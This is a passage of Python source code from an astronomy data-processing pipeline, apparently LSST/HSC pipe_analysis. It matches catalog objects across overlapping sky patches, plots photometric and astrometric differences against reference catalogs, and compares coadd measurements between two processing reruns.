patchList:\n if patch1 != patch2:\n overlapping = checkPatchOverlap([patch1, patch2], tractInfo)\n if overlapping:\n if {patch1, patch2} not in overlapPatchList:\n overlapPatchList.append({patch1, patch2})\n matchList = []\n matchRadius = self.config.matchOverlapRadius\n for patchPair in overlapPatchList:\n patchPair = list(patchPair)\n patchCat1 = goodCat[goodCat[\"patchId\"] == patchPair[0]].copy(deep=True)\n patchCat2 = goodCat[goodCat[\"patchId\"] == patchPair[1]].copy(deep=True)\n if len(patchCat1) > 0 and len(patchCat2) > 0:\n patchPairMatches = matchAndJoinCatalogs(patchCat1, patchCat2, matchRadius, log=self.log)\n if not 
patchPairMatches.empty:\n matchList.append(patchPairMatches)\n else:\n self.log.info(\"No \\\"good\\\" overlapping objects between patches {} and {}\".\n format(patchPair[0], patchPair[1]))\n else:\n self.log.info(\"No \\\"good\\\" overlapping objects between patches {} and {}\".\n format(patchPair[0], patchPair[1]))\n if matchList:\n matches = pd.concat(matchList, axis=0)\n else:\n matches = None\n return matches\n\n def plotOverlaps(self, overlaps, plotInfoDict, areaDict, matchRadius=None, matchRadiusUnitStr=None,\n zpLabel=None, forcedStr=None, postFix=\"\", fluxToPlotList=None, highlightList=None,\n uberCalLabel=None):\n yield\n schema = getSchema(overlaps)\n if not fluxToPlotList:\n fluxToPlotList = self.config.fluxToPlotList\n unitStr = \"mmag\" if self.config.toMilli else \"mag\"\n magEnforcer = Enforcer(requireLess={\"star\": {\"stdev\": 0.003*self.unitScale}})\n plotAllKwargs = dict(matchRadius=matchRadius, matchRadiusUnitStr=matchRadiusUnitStr, zpLabel=zpLabel,\n forcedStr=forcedStr, uberCalLabel=uberCalLabel, highlightList=highlightList)\n for col in fluxToPlotList:\n shortName = \"overlap_\" + col + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n if \"first_\" + col + \"_instFlux\" in schema:\n yield from self.AnalysisClass(overlaps, MagDiff(\"first_\" + col + \"_instFlux\",\n \"second_\" + col + \"_instFlux\",\n unitScale=self.unitScale),\n \" Overlap mag difference (%s) (%s)\" %\n (fluxToPlotString(col), unitStr),\n shortName, self.config.analysis, prefix=\"first_\",\n flags=[col + \"_flag\"], labeller=OverlapsStarGalaxyLabeller(),\n magThreshold=23, unitScale=self.unitScale\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=magEnforcer, **plotAllKwargs)\n unitStr = \"mas\" if self.config.toMilli else \"arcsec\"\n distEnforcer = Enforcer(requireLess={\"star\": {\"stdev\": 0.005*self.unitScale}})\n shortName = \"overlap_distance\" + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n overlaps, lambda cat: cat[\"distance\"]*(1.0*geom.radians).asArcseconds()*self.unitScale,\n \"Distance (%s)\" % unitStr, shortName, self.config.analysis, prefix=\"first_\", qMin=-0.01,\n qMax=0.11, labeller=OverlapsStarGalaxyLabeller(), forcedMean=0.0,\n unitScale=self.unitScale).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=distEnforcer, doPrintMedian=True, **plotAllKwargs)\n\n def plotPhotomMatches(self, matches, plotInfoDict, areaDict, refObjLoader, description=\"matches\",\n matchRadius=None, matchRadiusUnitStr=None, zpLabel=None, forcedStr=None,\n highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(matches)\n unitStr = \"mmag\" if self.config.toMilli else \"mag\"\n enforcer = None # Enforcer(requireLess={\"star\": {\"stdev\": 0.030*self.unitScale}}),\n fluxToPlotList = [\"base_PsfFlux\", \"base_CircularApertureFlux_12_0\"]\n plotAllKwargs = dict(zpLabel=zpLabel, forcedStr=forcedStr, uberCalLabel=uberCalLabel,\n highlightList=highlightList)\n if self.config.doApplyColorTerms:\n ct = self.config.colorterms.getColorterm(plotInfoDict[\"filter\"], refObjLoader.ref_dataset_name)\n else:\n # Pass in a null colorterm.\n # Obtain the filter name from the reference loader filter map, if\n # present, otherwise set to the canonical filter name.\n if plotInfoDict[\"filter\"] in refObjLoader.filterMap.keys():\n refFilterName = refObjLoader.filterMap[plotInfoDict[\"filter\"]]\n else:\n refFilterName = afwImage.Filter(afwImage.Filter(plotInfoDict[\"filter\"]).getId()).getName()\n ct = 
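Colorterm(primary=refFilterName, secondary=refFilterName)\n # With primary == secondary and the default zero coefficients, the\n # color term is effectively a no-op, so reference magnitudes pass\n # through unchanged.\n 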
self.log.warning(\"Note: no colorterms loaded for {:s}, thus no colorterms will be applied to \"\n \"the photometry reference catalog\".format(refObjLoader.ref_dataset_name))\n\n # Magnitude difference plots\n for flux in fluxToPlotList:\n fluxName = flux + \"_instFlux\"\n if highlightList is not None:\n matchHighlightList = list(highlightList)\n if not any(\"src_\" + flux + \"_flag\" in highlight for highlight in matchHighlightList):\n matchHighlightList += [(\"src_\" + flux + \"_flag\", 0, \"yellow\"), ]\n plotAllKwargs.update(highlightList=matchHighlightList)\n if \"src_calib_psf_used\" in schema:\n shortName = description + \"_\" + fluxToPlotString(fluxName) + \"_mag_calib_psf_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n matches, MagDiffMatches(fluxName, ct, zp=0.0, unitScale=self.unitScale),\n \"%s - ref (calib_psf_used) (%s)\" % (fluxToPlotString(fluxName), unitStr), shortName,\n self.config.analysisPhotomMatches, prefix=\"src_\", goodKeys=[\"calib_psf_used\"],\n labeller=MatchesStarGalaxyLabeller(), unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer, **plotAllKwargs)\n if \"src_calib_photometry_used\" in schema:\n shortName = description + \"_\" + fluxToPlotString(fluxName) + \"_mag_calib_photometry_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n matches, MagDiffMatches(fluxName, ct, zp=0.0, unitScale=self.unitScale),\n \" %s - ref (calib_photom_used) (%s)\" % (fluxToPlotString(fluxName), unitStr),\n shortName, self.config.analysisPhotomMatches, prefix=\"src_\",\n goodKeys=[\"calib_photometry_used\"], labeller=MatchesStarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer, **plotAllKwargs)\n shortName = description + \"_\" + fluxToPlotString(fluxName)\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n matches, MagDiffMatches(fluxName, ct, zp=0.0, unitScale=self.unitScale),\n \" %s - ref (%s)\" % (fluxToPlotString(fluxName), unitStr), shortName,\n self.config.analysisPhotomMatches, prefix=\"src_\", labeller=MatchesStarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, matchRadius=matchRadius,\n matchRadiusUnitStr=matchRadiusUnitStr, **plotAllKwargs)\n\n plotAllKwargs.update(highlightList=highlightList)\n\n def plotAstromMatches(self, matches, plotInfoDict, areaDict, refObjLoader, unpackedMatches=None,\n description=\"matches\", matchRadius=None, matchRadiusUnitStr=None, zpLabel=None,\n forcedStr=None, highlightList=None, uberCalLabel=None):\n yield\n if unpackedMatches is None:\n if \"patch\" not in plotInfoDict[\"dataId\"]:\n self.log.info(\"The denormalization of the persisted srcMatch failed (or was not done). \"\n \"Thus, the plots associated with the calib_astrometry_used flag will only \"\n \"include those that made it into the generically matched catalogs (which \"\n \"may not include all of the sources that were used in the SFM astrometric \"\n \"calibration).\")\n unpackedMatches = matches\n self.unpackedMatchLabel = forcedStr\n unpackedSchema = getSchema(unpackedMatches)\n unitStr = \"mmag\" if self.config.toMilli else \"mag\"\n enforcer = None # Enforcer(requireLess={\"star\": {\"stdev\": 0.030*self.unitScale}}),\n plotAllKwargs = dict(uberCalLabel=uberCalLabel, highlightList=highlightList)\n\n # Astrometry (positional) difference plots\n unitStr = \"mas\" if self.config.toMilli else \"arcsec\"\n qMatchScale = matchRadius if matchRadius else self.matchRadius\n if \"src_calib_astrometry_used\" in unpackedSchema:\n shortName = description + \"_distance_calib_astrometry_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n\n yield from self.AnalysisClass(\n unpackedMatches, lambda cat: cat[\"distance\"]*(1.0*geom.radians).asArcseconds()*self.unitScale,\n \"Distance (%s) (calib_astrom_used in SFM)\" % unitStr, shortName,\n self.config.analysisAstromMatches, prefix=\"src_\", goodKeys=[\"calib_astrometry_used\"],\n qMin=-0.02*qMatchScale, qMax=0.6*qMatchScale, labeller=MatchesStarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, doPrintMedian=True,\n forcedStr=self.unpackedMatchLabel,\n zpLabel=self.zpLabelPacked, **plotAllKwargs)\n shortName = description + \"_distance\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n stdevEnforcer = Enforcer(requireLess={\"star\": {\"stdev\": 0.050*self.unitScale}})\n yield from self.AnalysisClass(\n matches, lambda cat: cat[\"distance\"]*(1.0*geom.radians).asArcseconds()*self.unitScale,\n \"Distance (%s)\" % unitStr, shortName, self.config.analysisAstromMatches, prefix=\"src_\",\n qMin=-0.02*qMatchScale, qMax=0.6*qMatchScale, labeller=MatchesStarGalaxyLabeller(),\n forcedMean=0.0, unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=stdevEnforcer, doPrintMedian=True,\n matchRadius=matchRadius, matchRadiusUnitStr=matchRadiusUnitStr, forcedStr=forcedStr,\n zpLabel=zpLabel, **plotAllKwargs)\n if \"src_calib_astrometry_used\" in unpackedSchema:\n shortName = description + \"_raCosDec_calib_astrometry_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n unpackedMatches, AstrometryDiff(\"src_coord_ra\", \"ref_coord_ra\", declination1=\"src_coord_dec\",\n declination2=\"ref_coord_dec\", unitScale=self.unitScale),\n r\" $\\delta_{RA}$ = $\\Delta$RA*cos(Dec) (%s) (calib_astrom_used in SFM)\" % unitStr,\n shortName, self.config.analysisAstromMatches, prefix=\"src_\",\n goodKeys=[\"calib_astrometry_used\"], labeller=MatchesStarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n forcedStr=self.unpackedMatchLabel, zpLabel=self.zpLabelPacked, **plotAllKwargs)\n shortName = description + \"_raCosDec\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n stdevEnforcer = Enforcer(requireLess={\"star\": {\"stdev\": 0.050*self.unitScale}})\n yield from self.AnalysisClass(\n matches, AstrometryDiff(\"src_coord_ra\", \"ref_coord_ra\", declination1=\"src_coord_dec\",\n declination2=\"ref_coord_dec\", unitScale=self.unitScale),\n r\"$\\delta_{RA}$ = $\\Delta$RA*cos(Dec) (%s)\" % unitStr, shortName,\n self.config.analysisAstromMatches, 
prefix=\"src_\", labeller=MatchesStarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=stdevEnforcer,\n matchRadius=matchRadius, matchRadiusUnitStr=matchRadiusUnitStr, forcedStr=forcedStr,\n zpLabel=zpLabel, **plotAllKwargs)\n if \"src_calib_astrometry_used\" in unpackedSchema:\n shortName = description + \"_ra_calib_astrometry_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n unpackedMatches, AstrometryDiff(\"src_coord_ra\", \"ref_coord_ra\", unitScale=self.unitScale),\n r\"$\\Delta$RA (%s) (calib_astrom_used in SFM)\" % unitStr, shortName,\n self.config.analysisAstromMatches, prefix=\"src_\", goodKeys=[\"calib_astrometry_used\"],\n labeller=MatchesStarGalaxyLabeller(), unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n forcedStr=self.unpackedMatchLabel, zpLabel=self.zpLabelPacked, **plotAllKwargs)\n shortName = description + \"_ra\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n matches, AstrometryDiff(\"src_coord_ra\", \"ref_coord_ra\", unitScale=self.unitScale),\n r\"$\\Delta$RA (%s)\" % unitStr, shortName, self.config.analysisAstromMatches, prefix=\"src_\",\n labeller=MatchesStarGalaxyLabeller(), unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=stdevEnforcer, matchRadius=matchRadius,\n matchRadiusUnitStr=matchRadiusUnitStr, forcedStr=forcedStr, zpLabel=zpLabel, **plotAllKwargs)\n if \"src_calib_astrometry_used\" in unpackedSchema:\n shortName = description + \"_dec_calib_astrometry_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n unpackedMatches, AstrometryDiff(\"src_coord_dec\", \"ref_coord_dec\", unitScale=self.unitScale),\n r\"$\\delta_{Dec}$ (%s) (calib_astrom_used in SFM)\" % unitStr, shortName,\n self.config.analysisAstromMatches, prefix=\"src_\", goodKeys=[\"calib_astrometry_used\"],\n labeller=MatchesStarGalaxyLabeller(), unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n forcedStr=self.unpackedMatchLabel, zpLabel=self.zpLabelPacked, **plotAllKwargs)\n shortName = description + \"_dec\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n matches, AstrometryDiff(\"src_coord_dec\", \"ref_coord_dec\", unitScale=self.unitScale),\n r\"$\\delta_{Dec}$ (%s)\" % unitStr, shortName, self.config.analysisAstromMatches, prefix=\"src_\",\n labeller=MatchesStarGalaxyLabeller(), unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=stdevEnforcer, matchRadius=matchRadius,\n matchRadiusUnitStr=matchRadiusUnitStr, forcedStr=forcedStr, zpLabel=zpLabel, **plotAllKwargs)\n\n def plotCosmos(self, catalog, plotInfoDict, areaDict, cosmos):\n labeller = CosmosLabeller(cosmos, self.config.matchRadiusRaDec*geom.arcseconds)\n self.AnalysisClass(catalog, deconvMom, \"Deconvolved moments\", \"cosmos\", self.config.analysis,\n qMin=-1.0, qMax=6.0, labeller=labeller,\n ).plotAll(\"cosmos\", plotInfoDict, areaDict, self.log,\n enforcer=Enforcer(requireLess={\"star\": {\"stdev\": 0.2}}))\n\n def matchCatalog(self, catalog, filterName, astrometryConfig):\n try: # lsst.meas.extensions.astrometryNet is not setup by default\n from lsst.meas.extensions.astrometryNet import LoadAstrometryNetObjectsTask # noqa : F401\n except ImportError:\n return None\n refObjLoader = 
LoadAstrometryNetObjectsTask(self.config.refObjLoaderConfig)\n center = geom.averageSpherePoint([src.getCoord() for src in catalog])\n radius = max(center.separation(src.getCoord()) for src in catalog)\n filterName = afwImage.Filter(afwImage.Filter(filterName).getId()).getName() # Get primary name\n refs = refObjLoader.loadSkyCircle(center, radius, filterName).refCat\n matches = afwTable.matchRaDec(refs, catalog, self.config.matchRadiusRaDec*geom.arcseconds)\n matches = matchNanojanskyToAB(matches)\n return joinMatches(matches, \"ref_\", \"src_\")\n\n def plotRhoStatistics(self, catalog, plotInfoDict, zpLabel=None,\n forcedStr=None, postFix=\"\", uberCalLabel=None):\n \"\"\"Plot Rho Statistics with stars used for PSF modelling and non-PSF\n stars.\n \"\"\"\n yield\n stats = None\n\n # First do for calib_psf_used only.\n shortName = \"Rho\" + postFix + \"_calib_psf_used\"\n psfUsed = catalog[catalog[\"calib_psf_used\"]].copy(deep=True)\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(psfUsed, None,\n (\" Rho Statistics (calib_psf_used): \"),\n shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"], labeller=None\n ).plotRhoStatistics(shortName, plotInfoDict, self.log,\n treecorrParams=self.config.treecorrParams,\n stats=stats, zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel, verifyJob=self.verifyJob)\n\n # Now for all stars.\n shortName = \"Rho\" + postFix + \"_all_stars\"\n starsOnly = catalog[catalog[\"base_ClassificationExtendedness_value\"] < 0.5].copy(deep=True)\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(starsOnly, None,\n (\" Rho Statistics: \"),\n shortName, self.config.analysis, flags=[], labeller=None\n ).plotRhoStatistics(shortName, plotInfoDict, self.log,\n treecorrParams=self.config.treecorrParams,\n stats=stats, zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel, verifyJob=self.verifyJob)\n\n def plotQuiver(self, catalog, description, plotInfoDict, areaDict, matchRadius=None,\n zpLabel=None, forcedStr=None, postFix=\"\", flagsCat=None, uberCalLabel=None, scale=1):\n yield\n stats = None\n shortName = \"quiver\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, None, \"%s\" % shortName, shortName,\n self.config.analysis, labeller=None,\n ).plotQuiver(catalog, description, plotInfoDict, areaDict, self.log,\n stats=stats, zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel, scale=scale)\n\n def plotSkyObjects(self, catalog, description, plotInfoDict, areaDict, zpLabel=None, forcedStr=None,\n postFix=\"\", flagsCat=None):\n yield\n stats = None\n shortName = \"skyObjects\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, None, \"%s\" % shortName, shortName, self.config.analysis,\n labeller=None,).plotSkyObjects(catalog, shortName, plotInfoDict,\n self.log, zpLabel=zpLabel,\n forcedStr=forcedStr,\n verifyJob=self.verifyJob)\n\n skyplotKwargs = dict(stats=stats, zpLabel=zpLabel, forcedStr=forcedStr)\n skyFlux = \"base_CircularApertureFlux_9_0_instFlux\"\n skyFluxStr = fluxToPlotString(skyFlux)\n skyFluxes = catalog[skyFlux]*1e12\n qMin, qMax = 0.75*np.nanmin(skyFluxes), 0.75*np.nanmax(skyFluxes)\n yield from self.AnalysisClass(catalog, skyFluxes,\n \"%s\" % \"flux(*1e+12)= \" + shortName + \"[\" + skyFluxStr + \"]\", shortName,\n self.config.analysis, qMin=qMin, qMax=qMax, labeller=AllLabeller(),\n fluxColumn=skyFlux, magThreshold=99.0\n 
).plotSkyPosition(shortName, plotInfoDict, areaDict,\n dataName=\"all\", **skyplotKwargs)\n\n def plotSkyObjectsSky(self, catalog, description, plotInfoDict, forcedStr=None, alpha=0.7,\n doPlotTractImage=True, doPlotPatchOutline=True, sizeFactor=3.0, maxDiamPix=1000,\n columnName=\"base_CircularApertureFlux_9_0_instFlux\"):\n yield\n shortName = \"skyObjectsSky\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, None, \"%s\" % shortName, shortName, self.config.analysis,\n labeller=None,).plotInputCounts(catalog, plotInfoDict, self.log,\n forcedStr=forcedStr,\n alpha=alpha,\n doPlotTractImage=doPlotTractImage,\n doPlotPatchOutline=doPlotPatchOutline,\n sizeFactor=sizeFactor,\n maxDiamPix=maxDiamPix,\n columnName=columnName)\n\n def plotInputCounts(self, catalog, description, plotInfoDict, zpLabel=None, forcedStr=None,\n uberCalLabel=None, alpha=0.5, doPlotPatchOutline=True, sizeFactor=5.0,\n maxDiamPix=1000):\n yield\n shortName = \"inputCounts\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, None, \"%s\" % shortName, shortName,\n self.config.analysis, labeller=None,\n ).plotInputCounts(catalog, description, plotInfoDict, self.log,\n forcedStr=forcedStr, uberCalLabel=uberCalLabel,\n alpha=alpha, doPlotPatchOutline=doPlotPatchOutline,\n sizeFactor=sizeFactor, maxDiamPix=maxDiamPix)\n\n def _getConfigName(self):\n return None\n\n def _getMetadataName(self):\n return None\n\n def _getEupsVersionsName(self):\n return None\n\n\nclass CompareCoaddAnalysisConfig(CoaddAnalysisConfig):\n doReadParquetTables1 = Field(dtype=bool, default=True,\n doc=(\"Read parquet tables from postprocessing (e.g. deepCoadd_obj) as \"\n \"input1 data instead of afwTable catalogs.\"))\n doReadParquetTables2 = Field(dtype=bool, default=True,\n doc=(\"Read parquet tables from postprocessing (e.g. 
deepCoadd_obj) as \"\n \"input2 data instead of afwTable catalogs.\"))\n\n def setDefaults(self):\n CoaddAnalysisConfig.setDefaults(self)\n self.matchRadiusRaDec = 0.2\n self.matchRadiusXy = 1.0e-5 # has to be bigger than absolute zero\n if \"base_PsfFlux\" not in self.fluxToPlotList:\n self.fluxToPlotList.append(\"base_PsfFlux\") # Add PSF flux to default list for comparison scripts\n\n\nclass CompareCoaddAnalysisRunner(TaskRunner):\n @staticmethod\n def getTargetList(parsedCmd, **kwargs):\n kwargs[\"subdir\"] = parsedCmd.subdir\n rootDir = parsedCmd.input.split(\"rerun\")[0] if len(parsedCmd.rerun) == 2 else parsedCmd.input\n butlerArgs = dict(root=os.path.join(rootDir, \"rerun\", parsedCmd.rerun2))\n if parsedCmd.collection is not None:\n if parsedCmd.instrument is None:\n raise RuntimeError(\"Must provide --instrument command line option for gen3 repos.\")\n butler2 = dafButler.Butler(parsedCmd.rerun2, collections=parsedCmd.collection,\n instrument=parsedCmd.instrument)\n else:\n butlerArgs = dict(root=os.path.join(rootDir, \"rerun\", parsedCmd.rerun2))\n if parsedCmd.calib is not None:\n butlerArgs[\"calibRoot\"] = parsedCmd.calib\n butler2 = Butler(**butlerArgs)\n # parsedCmd.butler = butler2\n idParser = parsedCmd.id.__class__(parsedCmd.id.level)\n idParser.idList = parsedCmd.id.idList\n idParser.makeDataRefList(parsedCmd)\n\n if parsedCmd.collection is None:\n butler = parsedCmd.butler\n parsedCmd.butler = butler2\n idParser.makeDataRefList(parsedCmd)\n parsedCmd.butler = butler\n rerun2RefList = idParser.refList\n else:\n tract = parsedCmd.id.refList[0][0].dataId[\"tract\"]\n skyMap = butler2.get(\"skyMap\")\n tractInfo = skyMap.generateTract(tract)\n # Create a mapping from N,N patchId of Gen2 to integer id of Gen3\n patchIdToGen3Map = {}\n for patch in tractInfo:\n patchIndexStr = str(patch.getIndex()[0]) + \",\" + str(patch.getIndex()[1])\n patchIdToGen3Map[patchIndexStr] = tractInfo.getSequentialPatchIndex(patch)\n\n patchList = []\n gen3RefList = []\n for pId in parsedCmd.id.refList[0]:\n patchList.append(pId.dataId[\"patch\"])\n gen3PidList = idParser.idList.copy()\n if len(gen3PidList) < len(patchList):\n gen3PidList = gen3PidList*len(patchList)\n for gen3Pid, patchId in zip(gen3PidList, patchList):\n gen3PidCopy = copy.deepcopy(gen3Pid)\n if \"filter\" in gen3PidCopy:\n gen3PidCopy[\"physical_filter\"] = gen3PidCopy.pop(\"filter\")\n if parsedCmd.instrument == \"HSC\":\n gen3PidCopy[\"band\"] = filterToBandMap[gen3PidCopy[\"physical_filter\"]]\n gen3PidCopy[\"skymap\"] = \"hsc_rings_v1\"\n elif parsedCmd.instrument == \"LSSTCam-imSim\":\n gen3PidCopy[\"band\"] = gen3PidCopy[\"physical_filter\"]\n gen3PidCopy[\"skymap\"] = \"DC2\"\n else:\n raise RuntimeError(\"Unknown instrument {}. 
Currently only know HSC and \"\n \"LSSTCam-imSim.\".format(parsedCmd.instrument))\n gen3PidCopy[\"dataId\"] = gen3PidCopy.copy()\n gen3PidCopy[\"butler\"] = butler2\n gen3PidCopy[\"dataId\"][\"patch\"] = patchIdToGen3Map[patchId]\n gen3PidCopy[\"patch\"] = patchIdToGen3Map[patchId]\n gen3PidCopy[\"patchId\"] = patchId\n gen3PidCopy[\"camera\"] = parsedCmd.instrument\n gen3RefList.append(gen3PidCopy)\n rerun2RefList = [gen3RefList]\n\n return [(refList1, dict(patchRefList2=refList2, **kwargs)) for\n refList1, refList2 in zip(parsedCmd.id.refList, rerun2RefList)]\n\n\nclass CompareCoaddAnalysisTask(CoaddAnalysisTask):\n ConfigClass = CompareCoaddAnalysisConfig\n RunnerClass = CompareCoaddAnalysisRunner\n _DefaultName = \"compareCoaddAnalysis\"\n\n @classmethod\n def _makeArgumentParser(cls):\n parser = ArgumentParser(name=cls._DefaultName)\n parser.add_argument(\"--rerun2\", required=True, help=\"Second rerun, for comparison\")\n parser.add_argument(\"--collection\", required=False, default=None,\n help=\"Collection for rerun2 if it is Gen3\")\n parser.add_argument(\"--instrument\", required=False, default=None,\n help=\"Instrument for run if it is Gen3\")\n parser.add_id_argument(\"--id\", \"deepCoadd_forced_src\",\n help=\"data ID, e.g. --id tract=12345 patch=1,2 filter=HSC-X\",\n ContainerClass=TractDataIdContainer)\n parser.add_argument(\"--subdir\", type=str, default=\"\",\n help=(\"Subdirectory below plots/filter/tract-NNNN/ (useful for, \"\n \"e.g., subgrouping of Patches. Ignored if only one Patch is \"\n \"specified, in which case the subdir is set to patch-NNN\"))\n return parser\n\n def __init__(self, *args, **kwargs):\n CmdLineTask.__init__(self, *args, **kwargs)\n self.unitScale = 1000.0 if self.config.toMilli else 1.0\n self.matchRadius = self.config.matchRadiusXy if self.config.matchXy else self.config.matchRadiusRaDec\n self.matchRadiusUnitStr = \" (pixels)\" if self.config.matchXy else \"\\\"\"\n\n def runDataRef(self, patchRefList1, patchRefList2, subdir=\"\"):\n plotList = []\n haveForced = True # do forced datasets exist (may not for single band datasets)?\n dataset1 = \"Coadd_obj\" if self.config.doReadParquetTables1 else \"Coadd_forced_src\"\n patchRefExistsList1 = [patchRef1 for patchRef1 in patchRefList1 if\n patchRef1.datasetExists(self.config.coaddName + dataset1)]\n dataset2 = \"Coadd_obj\" if self.config.doReadParquetTables2 else \"Coadd_forced_src\"\n\n repoInfo2 = None\n for patchRef2 in patchRefList2: # Find an existing rerun2 dataset to assess if gen3\n try:\n repoInfo2 = getRepoInfo(patchRef2, coaddName=self.config.coaddName, coaddDataset=dataset2)\n break\n except Exception:\n if hasattr(patchRef2, \"dataId\"):\n dataId = patchRef2.dataId\n else:\n dataId = patchRef2[\"dataId\"]\n self.log.info(\"No patch found for {} in rerun2. Continuing search down patchRefList2.\".\n format(dataId))\n continue\n if repoInfo2 is None:\n raise TaskError(\"No data exists in patRefList2...\")\n\n if not repoInfo2.isGen3:\n patchRefExistsList2 = [patchRef2 for patchRef2 in patchRefList2 if\n patchRef2.datasetExists(self.config.coaddName + dataset2)]\n else:\n patchRefExistsList2 = []\n for patchRef2 in patchRefList2:\n dataId = patchRef2[\"dataId\"]\n try:\n patchRef2[\"butler\"].getURI(self.config.coaddName + dataset2, dataId=dataId)\n patchRefExistsList2.append(patchRef2)\n except LookupError:\n self.log.info(\"Could not find {} dataset for dataId {}. 
Skipping...\".\n format(dataset2, dataId))\n continue\n\n if not patchRefExistsList1 or not patchRefExistsList2:\n haveForced = False\n forcedStr = \"forced\" if haveForced else \"unforced\"\n if not haveForced:\n self.log.warning(\"Forced datasets do not exist for both input1 and input2 for tract: {0:d} \"\n \"filter: {1:s}. Plotting unforced results only.\".\n format(patchRefList1[0].dataId[\"tract\"], patchRefList1[0].dataId[\"filter\"]))\n dataset1 = \"Coadd_meas\"\n dataset2 = \"Coadd_meas\"\n patchRefExistsList1 = [patchRef1 for patchRef1 in patchRefList1 if\n patchRef1.datasetExists(self.config.coaddName + dataset1)]\n if not patchRefExistsList1:\n raise TaskError(\"No data exists in patRefList1: %s\" %\n ([patchRef1.dataId for patchRef1 in patchRefList1]))\n\n patchList1 = [patchRef.dataId[\"patch\"] for patchRef in patchRefExistsList1]\n patchIdList1 = patchList1\n if repoInfo2.isGen3:\n patchList2 = [patchRef[\"patchId\"] for patchRef in patchRefExistsList2]\n else:\n patchList2 = patchList1\n patchRefList1 = patchRefExistsList1\n patchRefList2 = patchRefExistsList2\n\n repoInfo1 = getRepoInfo(patchRefList1[0], coaddName=self.config.coaddName, coaddDataset=dataset1)\n repoInfo2 = getRepoInfo(patchRefList2[0], coaddName=self.config.coaddName, coaddDataset=dataset2)\n hscRun = repoInfo1.hscRun if repoInfo1.hscRun else repoInfo2.hscRun\n # Find a visit/ccd input so that you can check for meas_mosaic input\n # (i.e. to set uberCalLabel).\n self.uberCalLabel1 = determineExternalCalLabel(repoInfo1, patchList1[0],\n coaddName=self.config.coaddName)\n self.uberCalLabel2 = determineExternalCalLabel(repoInfo2, patchList2[0],\n coaddName=self.config.coaddName)\n self.uberCalLabel1 = self.uberCalLabel1.replace(\" wcs\", \"_1 wcs\")\n self.uberCalLabel2 = self.uberCalLabel2.replace(\" wcs\", \"_2 wcs\")\n self.uberCalLabel = self.uberCalLabel1 + \"_1\\n\" + self.uberCalLabel2 + \"_2\"\n self.log.info(f\"External calibration(s) used: {self.uberCalLabel}\")\n\n if self.config.doReadParquetTables1 or self.config.doReadParquetTables2:\n if self.config.doReadParquetTables1:\n if haveForced:\n forced1, _ = self.readParquetTables(patchRefList1, self.config.coaddName + \"Coadd_obj\",\n repoInfo1, \"forced_src\")\n unforced1, _ = self.readParquetTables(patchRefList1, self.config.coaddName + \"Coadd_obj\",\n repoInfo1, \"meas\")\n areaDict1, _ = computeAreaDict(repoInfo1, patchRefList1,\n dataset=self.config.coaddName + \"Coadd\", fakeCat=None)\n if self.config.doReadParquetTables2:\n if haveForced:\n forced2, _ = self.readParquetTables(patchRefList2, self.config.coaddName + \"Coadd_obj\",\n repoInfo2, \"forced_src\")\n unforced2, _ = self.readParquetTables(patchRefList2, self.config.coaddName + \"Coadd_obj\",\n repoInfo2, \"meas\")\n\n if not self.config.doReadParquetTables1 or not self.config.doReadParquetTables2:\n aliasDictList = [self.config.flagsToAlias, ]\n if hscRun and self.config.srcSchemaMap is not None:\n aliasDictList += [self.config.srcSchemaMap]\n\n if not self.config.doReadParquetTables1:\n catStruct1 = self.readAfwCoaddTables(patchRefList1, repoInfo1, haveForced,\n aliasDictList=aliasDictList)\n unforced1 = catStruct1.unforced\n forced1 = catStruct1.forced\n areaDict1 = catStruct1.areaDict\n\n if not self.config.doReadParquetTables2:\n 